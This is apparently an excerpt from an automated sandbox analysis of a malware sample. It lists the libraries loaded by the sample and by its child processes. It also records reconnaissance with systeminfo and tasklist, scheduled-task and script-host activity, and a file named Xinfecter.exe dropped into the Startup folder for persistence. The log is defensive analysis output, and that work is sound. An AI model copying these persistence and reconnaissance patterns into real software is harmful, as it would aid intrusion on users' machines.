        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
        Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netapi32.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: samcli.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: dsrole.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
        Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
